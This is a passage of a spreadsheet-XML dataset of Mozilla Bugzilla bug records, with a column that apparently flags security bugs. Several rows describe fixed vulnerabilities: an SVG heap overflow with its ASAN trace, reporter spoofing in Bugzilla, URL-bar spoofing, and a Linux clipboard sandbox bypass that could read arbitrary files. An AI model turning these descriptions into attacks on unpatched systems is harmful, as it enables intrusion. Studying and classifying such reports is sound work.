Firefox: ASAN build from https://ftp.mozilla.org/pub/mozilla.org/firefox/tinderbox-builds/mozilla-central-linux64-asan/1427796124/
Note:
Repro-file will also crash stable Firefox 36.0.4 on Ubuntu 14.04
Crash report-ID: bp-6e47afc4-a88c-4cf3-a591-0a0552150331
ASAN-trace:
==1594==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x621000e67503 at pc 0x7fdce471f097 bp 0x7fffec35a250 sp 0x7fffec35a248
WRITE of size 1 at 0x621000e67503 thread T0 (Web Content)
    #0 0x7fdce471f096 in SVGTextFrame::ResolvePositions(nsIContent*, unsigned int, bool, bool&amp;, nsTArray&lt;gfxPoint&gt;&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/svg/SVGTextFrame.cpp:4403
    #1 0x7fdce471ee90 in SVGTextFrame::ResolvePositions(nsIContent*, unsigned int, bool, bool&amp;, nsTArray&lt;gfxPoint&gt;&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/svg/SVGTextFrame.cpp:4519
    #2 0x7fdce47203b5 in SVGTextFrame::ResolvePositions(nsTArray&lt;gfxPoint&gt;&amp;, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/svg/SVGTextFrame.cpp:4564
    #3 0x7fdce4726769 in SVGTextFrame::DoGlyphPositioning() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/svg/SVGTextFrame.cpp:5017
    #4 0x7fdce4715179 in UpdateGlyphPositioning /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/svg/SVGTextFrame.cpp:5187
    #5 0x7fdce4715179 in SVGTextFrame::ReflowSVG() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/svg/SVGTextFrame.cpp:3819
    #6 0x7fdce471759b in nsSVGDisplayContainerFrame::ReflowSVG() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/svg/nsSVGContainerFrame.cpp:356
    #7 0x7fdce477cdbe in nsSVGOuterSVGFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/svg/nsSVGOuterSVGFrame.cpp:437
.
.
.
0x621000e67503 is located 3 bytes to the right of 4096-byte region [0x621000e66500,0x621000e67500)
allocated by thread T0 (Web Content) here:
    #0 0x474c1b in realloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:95
    #1 0x49213d in moz_xrealloc /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/memory/mozalloc/mozalloc.cpp:121
    #2 0x7fdcde6d1adf in Realloc /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/media/libstagefright/../../dist/include/nsTArray.h:185
    #3 0x7fdcde6d1adf in nsTArray_base&lt;nsTArrayInfallibleAllocator, nsTArray_CopyWithMemutils&gt;::EnsureCapacity(unsigned long, unsigned long) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/media/libstagefright/../../dist/include/nsTArray-inl.h:182
    #4 0x7fdce471fe2a in AppendElement&lt;mozilla::CharPosition&gt; /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/layout/svg/../../dist/include/nsTArray.h:1353
    #5 0x7fdce471fe2a in SVGTextFrame::ResolvePositions(nsTArray&lt;gfxPoint&gt;&amp;, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/svg/SVGTextFrame.cpp:4555
    #6 0x7fdce4726769 in SVGTextFrame::DoGlyphPositioning() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/svg/SVGTextFrame.cpp:5017
    #7 0x7fdce4715179 in UpdateGlyphPositioning /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/svg/SVGTextFrame.cpp:5187
    #8 0x7fdce4715179 in SVGTextFrame::ReflowSVG() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/svg/SVGTextFrame.cpp:3819
.
.
.</t>
        </is>
      </c>
      <c r="X2447" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2448">
      <c r="A2448" t="n">
        <v>877369</v>
      </c>
      <c r="B2448" t="inlineStr">
        <is>
          <t>2013-05-29 13:42:11 -0700</t>
        </is>
      </c>
      <c r="C2448" t="inlineStr">
        <is>
          <t>search: result summary should use get_summary()</t>
        </is>
      </c>
      <c r="D2448" t="inlineStr">
        <is>
          <t>2020-05-15 11:46:04 -0700</t>
        </is>
      </c>
      <c r="E2448" t="n">
        <v>1</v>
      </c>
      <c r="F2448" t="n">
        <v>1</v>
      </c>
      <c r="G2448" t="n">
        <v>6</v>
      </c>
      <c r="H2448" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2448" t="inlineStr">
        <is>
          <t>developer.mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J2448" t="inlineStr">
        <is>
          <t>Search</t>
        </is>
      </c>
      <c r="K2448" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2448" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2448" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2448" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2448" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2448" t="inlineStr">
        <is>
          <t>[type:change]</t>
        </is>
      </c>
      <c r="Q2448" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2448" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2448" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2448" t="n">
        <v>1</v>
      </c>
      <c r="U2448" t="n">
        <v>1</v>
      </c>
      <c r="V2448" t="n">
        <v>5</v>
      </c>
      <c r="W2448" t="inlineStr">
        <is>
          <t>Index get_summary() output into a 'summary' field in ES.
Show this summary in the results - highlighted if possible.</t>
        </is>
      </c>
      <c r="X2448" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2449">
      <c r="A2449" t="n">
        <v>571706</v>
      </c>
      <c r="B2449" t="inlineStr">
        <is>
          <t>2010-06-12 13:47:33 -0700</t>
        </is>
      </c>
      <c r="C2449" t="inlineStr">
        <is>
          <t>Firefox 3.6.3 topcrash report times out before loading</t>
        </is>
      </c>
      <c r="D2449" t="inlineStr">
        <is>
          <t>2011-12-28 10:40:11 -0800</t>
        </is>
      </c>
      <c r="E2449" t="n">
        <v>1</v>
      </c>
      <c r="F2449" t="n">
        <v>1</v>
      </c>
      <c r="G2449" t="n">
        <v>4</v>
      </c>
      <c r="H2449" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2449" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J2449" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2449" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2449" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2449" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2449" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2449" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2449" t="inlineStr"/>
      <c r="Q2449" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2449" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2449" t="inlineStr">
        <is>
          <t>1.9</t>
        </is>
      </c>
      <c r="T2449" t="n">
        <v>1</v>
      </c>
      <c r="U2449" t="n">
        <v>0</v>
      </c>
      <c r="V2449" t="n">
        <v>5</v>
      </c>
      <c r="W2449" t="inlineStr">
        <is>
          <t>When I try to load http://crash-stats.mozilla.com/topcrasher/byversion/Firefox/3.6.3 the browser waits for a bit, and then gives a "The connection was reset" error page.
(By comparison, http://crash-stats.mozilla.com/topcrasher/byversion/Firefox/3.6.4 loads, but it takes quite a while to do so.)</t>
        </is>
      </c>
      <c r="X2449" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2450">
      <c r="A2450" t="n">
        <v>108516</v>
      </c>
      <c r="B2450" t="inlineStr">
        <is>
          <t>2001-11-05 07:30:36 -0800</t>
        </is>
      </c>
      <c r="C2450" t="inlineStr">
        <is>
          <t>[security] It's possible to file a bug as somebody you're not.</t>
        </is>
      </c>
      <c r="D2450" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:27 -0800</t>
        </is>
      </c>
      <c r="E2450" t="n">
        <v>1</v>
      </c>
      <c r="F2450" t="n">
        <v>1</v>
      </c>
      <c r="G2450" t="n">
        <v>4</v>
      </c>
      <c r="H2450" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2450" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2450" t="inlineStr">
        <is>
          <t>Creating/Changing Bugs</t>
        </is>
      </c>
      <c r="K2450" t="inlineStr">
        <is>
          <t>2.15</t>
        </is>
      </c>
      <c r="L2450" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2450" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2450" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2450" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2450" t="inlineStr">
        <is>
          <t>applied to 2.14.1</t>
        </is>
      </c>
      <c r="Q2450" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2450" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S2450" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T2450" t="n">
        <v>1</v>
      </c>
      <c r="U2450" t="n">
        <v>0</v>
      </c>
      <c r="V2450" t="n">
        <v>18</v>
      </c>
      <c r="W2450" t="inlineStr">
        <is>
          <t>If you take the enter bug form and hack it to change the reporter field, you can
file a bug as anybody you want... to prove my point, I'm gonna file as nobody :)</t>
        </is>
      </c>
      <c r="X2450" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2451">
      <c r="A2451" t="n">
        <v>1276976</v>
      </c>
      <c r="B2451" t="inlineStr">
        <is>
          <t>2016-05-31 08:46:15 -0700</t>
        </is>
      </c>
      <c r="C2451" t="inlineStr">
        <is>
          <t>&lt;select&gt; dropdown menu can be used for URL bar spoofing on e10s</t>
        </is>
      </c>
      <c r="D2451" t="inlineStr">
        <is>
          <t>2021-03-22 02:32:25 -0700</t>
        </is>
      </c>
      <c r="E2451" t="n">
        <v>1</v>
      </c>
      <c r="F2451" t="n">
        <v>1</v>
      </c>
      <c r="G2451" t="n">
        <v>3</v>
      </c>
      <c r="H2451" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2451" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2451" t="inlineStr">
        <is>
          <t>Layout: Form Controls</t>
        </is>
      </c>
      <c r="K2451" t="inlineStr">
        <is>
          <t>49 Branch</t>
        </is>
      </c>
      <c r="L2451" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2451" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2451" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2451" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2451" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][e10s only][adv-main50+]</t>
        </is>
      </c>
      <c r="Q2451" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2451" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2451" t="inlineStr">
        <is>
          <t>mozilla50</t>
        </is>
      </c>
      <c r="T2451" t="n">
        <v>1</v>
      </c>
      <c r="U2451" t="n">
        <v>0</v>
      </c>
      <c r="V2451" t="n">
        <v>22</v>
      </c>
      <c r="W2451" t="inlineStr">
        <is>
          <t>Created attachment 8758338
testcase
STR
1. load the attached testcase
2. click anywhere on the page background
ACTUAL RESULT
The dropdown menu opens upward, covering the URL bar.
EXPECTED RESULT
The dropdown menu should not cover the URL bar in any situation.
See bug 575294, bug 868327 for background on the problem and how we
fixed this on non-e10s.</t>
        </is>
      </c>
      <c r="X2451" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2452">
      <c r="A2452" t="n">
        <v>1614908</v>
      </c>
      <c r="B2452" t="inlineStr">
        <is>
          <t>2020-02-12 03:23:33 -0800</t>
        </is>
      </c>
      <c r="C2452" t="inlineStr">
        <is>
          <t>Perma doc-upload | botocore.exceptions.ClientError: An error occurred (InvalidRequest) when calling the PutBucketWebsite operation</t>
        </is>
      </c>
      <c r="D2452" t="inlineStr">
        <is>
          <t>2022-08-17 14:00:13 -0700</t>
        </is>
      </c>
      <c r="E2452" t="n">
        <v>1</v>
      </c>
      <c r="F2452" t="n">
        <v>1</v>
      </c>
      <c r="G2452" t="n">
        <v>7</v>
      </c>
      <c r="H2452" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I2452" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="J2452" t="inlineStr">
        <is>
          <t>Source Documentation</t>
        </is>
      </c>
      <c r="K2452" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2452" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2452" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2452" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2452" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2452" t="inlineStr"/>
      <c r="Q2452" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2452" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2452" t="inlineStr">
        <is>
          <t>mozilla75</t>
        </is>
      </c>
      <c r="T2452" t="n">
        <v>1</v>
      </c>
      <c r="U2452" t="n">
        <v>0</v>
      </c>
      <c r="V2452" t="n">
        <v>9</v>
      </c>
      <c r="W2452" t="inlineStr">
        <is>
          <t>**Filed by:** ccoroiu [at] mozilla.com
**Parsed log:** https://treeherder.mozilla.org/logviewer.html#?job_id=288489842&amp;repo=mozilla-central
**Full log:** https://firefox-ci-tc.services.mozilla.com/api/queue/v1/task/E5UH5R_GTsKa1LMlmJoWUA/runs/0/artifacts/public/logs/live_backing.log
---
[task 2020-02-12T09:52:00.547Z] WARNING: autodoc: failed to import module 'invoke_mach_command' from module 'mach.test'; the following exception was raised:
[task 2020-02-12T09:52:00.547Z] Traceback (most recent call last):
[task 2020-02-12T09:52:00.547Z]   File "/builds/worker/checkouts/gecko/obj-x86_64-pc-linux-gnu/_virtualenvs/moztreedocs-A8BSWbM4/lib/python3.6/site-packages/sphinx/ext/autodoc/importer.py", line 32, in import_module
[task 2020-02-12T09:52:00.547Z]     return importlib.import_module(modname)
[task 2020-02-12T09:52:00.547Z]   File "/usr/lib/python3.6/importlib/__init__.py", line 126, in import_module
[task 2020-02-12T09:52:00.547Z]     return _bootstrap._gcd_import(name[level:], package, level)
[task 2020-02-12T09:52:00.547Z]   File "&lt;frozen importlib._bootstrap&gt;", line 994, in _gcd_import
[task 2020-02-12T09:52:00.547Z]   File "&lt;frozen importlib._bootstrap&gt;", line 971, in _find_and_load
[task 2020-02-12T09:52:00.547Z]   File "&lt;frozen importlib._bootstrap&gt;", line 955, in _find_and_load_unlocked
[task 2020-02-12T09:52:00.547Z]   File "&lt;frozen importlib._bootstrap&gt;", line 665, in _load_unlocked
[task 2020-02-12T09:52:00.547Z]   File "&lt;frozen importlib._bootstrap_external&gt;", line 678, in exec_module
[task 2020-02-12T09:52:00.547Z]   File "&lt;frozen importlib._bootstrap&gt;", line 219, in _call_with_frames_removed
[task 2020-02-12T09:52:00.548Z]   File "/builds/worker/checkouts/gecko/python/mach/mach/test/invoke_mach_command.py", line 5, in &lt;module&gt;
[task 2020-02-12T09:52:00.548Z]     subprocess.check_call([sys.executable] + sys.argv[1:])
[task 2020-02-12T09:52:00.548Z]   File "/usr/lib/python3.6/subprocess.py", line 311, in check_call
[task 2020-02-12T09:52:00.548Z]     raise CalledProcessError(retcode, cmd)
[task 2020-02-12T09:52:00.548Z] subprocess.CalledProcessError: Command '['/usr/bin/python3', 'doc', '--upload', '--no-open', '--no-serve']' returned non-zero exit status 2.
[task 2020-02-12T09:52:00.548Z] 
[task 2020-02-12T09:52:00.548Z] WARNING: autodoc: failed to import module 'registrar_dispatch' from module 'mach.test'; the following exception was raised:
[task 2020-02-12T09:52:00.548Z] Traceback (most recent call last):
[task 2020-02-12T09:52:00.548Z]   File "/builds/worker/checkouts/gecko/obj-x86_64-pc-linux-gnu/_virtualenvs/moztreedocs-A8BSWbM4/lib/python3.6/site-packages/sphinx/ext/autodoc/importer.py", line 32, in import_module
[task 2020-02-12T09:52:00.548Z]     return importlib.import_module(modname)
[task 2020-02-12T09:52:00.548Z]   File "/usr/lib/python3.6/importlib/__init__.py", line 126, in import_module
[task 2020-02-12T09:52:00.548Z]     return _bootstrap._gcd_import(name[level:], package, level)
[task 2020-02-12T09:52:00.548Z]   File "&lt;frozen importlib._bootstrap&gt;", line 994, in _gcd_import
[task 2020-02-12T09:52:00.548Z]   File "&lt;frozen importlib._bootstrap&gt;", line 971, in _find_and_load
[task 2020-02-12T09:52:00.548Z]   File "&lt;frozen importlib._bootstrap&gt;", line 955, in _find_and_load_unlocked
[task 2020-02-12T09:52:00.548Z]   File "&lt;frozen importlib._bootstrap&gt;", line 665, in _load_unlocked
[task 2020-02-12T09:52:00.548Z]   File "&lt;frozen importlib._bootstrap_external&gt;", line 678, in exec_module
[task 2020-02-12T09:52:00.548Z]   File "&lt;frozen importlib._bootstrap&gt;", line 219, in _call_with_frames_removed
[task 2020-02-12T09:52:00.548Z]   File "/builds/worker/checkouts/gecko/python/mach/mach/test/registrar_dispatch.py", line 4, in &lt;module&gt;
[task 2020-02-12T09:52:00.548Z]     self._mach_context.commands.dispatch('uuid', self._mach_context)  # noqa: F821
[task 2020-02-12T09:52:00.548Z] NameError: name 'self' is not defined</t>
        </is>
      </c>
      <c r="X2452" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2453">
      <c r="A2453" t="n">
        <v>945334</v>
      </c>
      <c r="B2453" t="inlineStr">
        <is>
          <t>2013-12-02 10:16:01 -0800</t>
        </is>
      </c>
      <c r="C2453" t="inlineStr">
        <is>
          <t>MediaManager's JS Objects released on non-main threads</t>
        </is>
      </c>
      <c r="D2453" t="inlineStr">
        <is>
          <t>2015-02-25 20:47:02 -0800</t>
        </is>
      </c>
      <c r="E2453" t="n">
        <v>1</v>
      </c>
      <c r="F2453" t="n">
        <v>1</v>
      </c>
      <c r="G2453" t="n">
        <v>3</v>
      </c>
      <c r="H2453" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2453" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2453" t="inlineStr">
        <is>
          <t>WebRTC</t>
        </is>
      </c>
      <c r="K2453" t="inlineStr">
        <is>
          <t>26 Branch</t>
        </is>
      </c>
      <c r="L2453" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2453" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2453" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2453" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2453" t="inlineStr">
        <is>
          <t>[qa-][adv-main27+][adv-esr24.3+]</t>
        </is>
      </c>
      <c r="Q2453" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2453" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2453" t="inlineStr">
        <is>
          <t>mozilla28</t>
        </is>
      </c>
      <c r="T2453" t="n">
        <v>1</v>
      </c>
      <c r="U2453" t="n">
        <v>0</v>
      </c>
      <c r="V2453" t="n">
        <v>26</v>
      </c>
      <c r="W2453" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #929029 +++
From, Bug 929029 Comment 57, some MediaManager's JS Objects seems to be released on non main thread.</t>
        </is>
      </c>
      <c r="X2453" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2454">
      <c r="A2454" t="n">
        <v>1799156</v>
      </c>
      <c r="B2454" t="inlineStr">
        <is>
          <t>2022-11-04 08:17:12 -0700</t>
        </is>
      </c>
      <c r="C2454" t="inlineStr">
        <is>
          <t>Potential Linux arbitrary read sandbox bypass using clipboard</t>
        </is>
      </c>
      <c r="D2454" t="inlineStr">
        <is>
          <t>2023-07-17 13:27:03 -0700</t>
        </is>
      </c>
      <c r="E2454" t="n">
        <v>1</v>
      </c>
      <c r="F2454" t="n">
        <v>1</v>
      </c>
      <c r="G2454" t="n">
        <v>3</v>
      </c>
      <c r="H2454" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2454" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2454" t="inlineStr">
        <is>
          <t>DOM: Copy &amp; Paste and Drag &amp; Drop</t>
        </is>
      </c>
      <c r="K2454" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2454" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2454" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2454" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2454" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2454" t="inlineStr">
        <is>
          <t>[post-critsmash-triage] [adv-main108+] [adv-esr102.6+]</t>
        </is>
      </c>
      <c r="Q2454" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2454" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S2454" t="inlineStr">
        <is>
          <t>109 Branch</t>
        </is>
      </c>
      <c r="T2454" t="n">
        <v>1</v>
      </c>
      <c r="U2454" t="n">
        <v>0</v>
      </c>
      <c r="V2454" t="n">
        <v>32</v>
      </c>
      <c r="W2454" t="inlineStr">
        <is>
          <t>While reviewing https://phabricator.services.mozilla.com/D160944?id=643029, I noticed a potential mechanism to read arbitrary files from a compromised content process on Linux. I am unsure if a similar mechanism exists on other platforms.
In that patch, :evilpie adds a new automation-only case to `nsClipboard::SelectionGetEvent` to allow writing to the `"text/uri-list"` MIME type. This is gated to be automation-only because if a `file://` URI is put into the `text/uri-list` MIME type, we'll read said file from the disk and send its contents to the content process (currently only for images, but after bug 1308007, if `dom.events.dataTransfer.mozFile.enabled` is enabled, we will send down arbitrary files). As is noted in the patch, writing this would allow content processes to read arbitrary files.
Unfortunately, I think it is already possible to write a valid `text/uri-list` entry, even without that patch. The fallback case below (https://searchfox.org/mozilla-central/rev/eddb810ffd5499f0984123fe4bfea6064ebad3c8/widget/gtk/nsClipboard.cpp#913-945), is nearly identical to the new code, except that it passes the data through `nsPrimitiveHelpers::CreateDataFromPrimitive`. This method will only pass through narrow strings if the MIME type is `kTextMime` or `kCustomTypesMime` (https://searchfox.org/mozilla-central/rev/eddb810ffd5499f0984123fe4bfea6064ebad3c8/widget/nsPrimitiveHelpers.cpp#128-129), and will pass through the `nsString` otherwise. 
This means the only thing preventing setting up the read is that we can only write wide strings, while the OS is expecting narrow strings. Unfortunately I don't think there's any validation between IPC and this code that the wide string is valid utf-16, so it's likely possible for a compromised content process to fill the wide string's data with a valid `file:///` URI narrow string, and get us to read an arbitrary file from the clipboard (as we don't tell the OS the string width we're passing in).
I don't know what the solution here is, but my current impression is that we probably want to at least restrict content processes to a minimal allow-list of MIME types which they can access, and validate it both when reading and writing.</t>
        </is>
      </c>
      <c r="X2454" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2455">
      <c r="A2455" t="n">
        <v>867163</v>
      </c>
      <c r="B2455" t="inlineStr">
        <is>
          <t>2013-04-30 07:58:25 -0700</t>
        </is>
      </c>
      <c r="C2455" t="inlineStr">
        <is>
          <t>Defect - Restore tile button doesn't work when context app bar is visible on a second time</t>
        </is>
      </c>
      <c r="D2455" t="inlineStr">
        <is>
          <t>2014-07-24 11:06:19 -0700</t>
        </is>
      </c>
      <c r="E2455" t="n">
        <v>1</v>
      </c>
      <c r="F2455" t="n">
        <v>1</v>
      </c>
      <c r="G2455" t="n">
        <v>6</v>
      </c>
      <c r="H2455" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2455" t="inlineStr">
        <is>
          <t>Firefox for Metro Graveyard</t>
        </is>
      </c>
      <c r="J2455" t="inlineStr">
        <is>
          <t>Browser</t>
        </is>
      </c>
      <c r="K2455" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2455" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2455" t="inlineStr">
        <is>
          <t>Windows 8.1</t>
        </is>
      </c>
      <c r="N2455" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2455" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2455" t="inlineStr">
        <is>
          <t>feature=defect c=Awesome_screen u=metro_firefox_user p=1</t>
        </is>
      </c>
      <c r="Q2455" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2455" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2455" t="inlineStr">
        <is>
          <t>Firefox 23</t>
        </is>
      </c>
      <c r="T2455" t="n">
        <v>1</v>
      </c>
      <c r="U2455" t="n">
        <v>0</v>
      </c>
      <c r="V2455" t="n">
        <v>14</v>
      </c>
      <c r="W2455" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (Windows NT 6.2; WOW64; rv:23.0) Gecko/20130429 Firefox/23.0
1. Select a tile/group of tiles from Top Sites
2. Remove that tile by clicking the "Hide" button from context app bar
3. Right click on Awesome screen to make context app bar disappear
4. Right click again to re-make context app bar visible
5. Click on "Restore" button
Expected result:
Tile/group of tile should be restored.
Found while verifying bug 831918.</t>
        </is>
      </c>
      <c r="X2455" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2456">
      <c r="A2456" t="n">
        <v>1334465</v>
      </c>
      <c r="B2456" t="inlineStr">
        <is>
          <t>2017-01-27 05:49:56 -0800</t>
        </is>
      </c>
      <c r="C2456" t="inlineStr">
        <is>
          <t>[e10s] Crash in IPCError-browser | PHttpChannel::Msg_SetPriority Route error: message sent to unknown actor ID</t>
        </is>
      </c>
      <c r="D2456" t="inlineStr">
        <is>
          <t>2018-02-20 13:23:58 -0800</t>
        </is>
      </c>
      <c r="E2456" t="n">
        <v>1</v>
      </c>
      <c r="F2456" t="n">
        <v>1</v>
      </c>
      <c r="G2456" t="n">
        <v>3</v>
      </c>
      <c r="H2456" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2456" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2456" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K2456" t="inlineStr">
        <is>
          <t>52 Branch</t>
        </is>
      </c>
      <c r="L2456" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2456" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N2456" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2456" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2456" t="inlineStr">
        <is>
          <t>[necko-active]</t>
        </is>
      </c>
      <c r="Q2456" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2456" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2456" t="inlineStr">
        <is>
          <t>mozilla60</t>
        </is>
      </c>
      <c r="T2456" t="n">
        <v>1</v>
      </c>
      <c r="U2456" t="n">
        <v>0</v>
      </c>
      <c r="V2456" t="n">
        <v>37</v>
      </c>
      <c r="W2456" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-91708d65-f0f7-4262-8302-320302170127.
=============================================================
Crashing Thread (0)
Frame 	Module 	Signature 	Source
0 	ntdll.dll 	KiFastSystemCallRet 	
1 	ntdll.dll 	NtWaitForMultipleObjects 	
2 	kernel32.dll 	CreateFileMappingA 	
3 	user32.dll 	RealMsgWaitForMultipleObjectsEx 	
4 	xul.dll 	mozilla::widget::WinUtils::WaitForMessage(unsigned long) 	widget/windows/WinUtils.cpp:792
5 	xul.dll 	nsAppShell::ProcessNextNativeEvent(bool) 	widget/windows/nsAppShell.cpp:382
6 	xul.dll 	nsBaseAppShell::DoProcessNextNativeEvent(bool) 	widget/nsBaseAppShell.cpp:138
7 	xul.dll 	nsBaseAppShell::OnProcessNextEvent(nsIThreadInternal*, bool) 	widget/nsBaseAppShell.cpp:289
